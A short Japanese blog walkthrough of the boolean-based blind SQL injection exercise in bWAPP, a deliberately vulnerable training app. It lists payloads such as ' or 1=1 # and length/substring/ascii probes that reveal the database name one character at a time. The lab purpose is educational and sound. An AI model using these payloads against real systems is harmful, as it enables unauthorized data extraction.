shikata ga nai

Private? There is no such things.

bWAPPでA1-SQL Injection-Blind-Boolean-Based

Hello there,

 

A1 ⇨ SQL Injection - Blind - Boolean-Basedを選択して。

 

f:id:ThisIsOne:20191223160248p:plain

 

地味に真偽の結果を組み合わせて。

解析する必要がありまして。

手はじめに『'』を入力してみて。

データベース名やバージョンなどのエラー表示はなく。

 

f:id:ThisIsOne:20191223160625p:plain

 

次にインジェクション攻撃ができるかを確認して。

 ' or 1=1 #

 

f:id:ThisIsOne:20191223160733p:plain

 

データベース名の長さを順に調査して。

 ' or 1=1 and length(database())=1 #

 ' or 1=1 and length(database())=2 #

 ' or 1=1 and length(database())=3 #

 ' or 1=1 and length(database())=4 #

 ' or 1=1 and length(database())=5 #

 

f:id:ThisIsOne:20191223161040p:plain

 

データベース名の初めの文字を調査して。

 ' or 1=1 and substring(database(),1,1)='a' #

 ' or 1=1 and substring(database(),1,1)='b' #

 

f:id:ThisIsOne:20191223161241p:plain

二番目の文字は、大文字Vよりも大きいかを確認して。

 ' or 1=1 and ascii(substring(database(),2,1))>86 #

 

f:id:ThisIsOne:20191223161734p:plain

 

データベース名は、『bWAPP』かどうかを確認して。

 ' or 1=1 and database()='bWAPP' #

 

f:id:ThisIsOne:20191223162002p:plain

 

Best regards,

ひとりひとりの自覚をもった行動で、医療従事者と保健所職員を助けよう。

f:id:ThisIsOne:20200404115457p:plain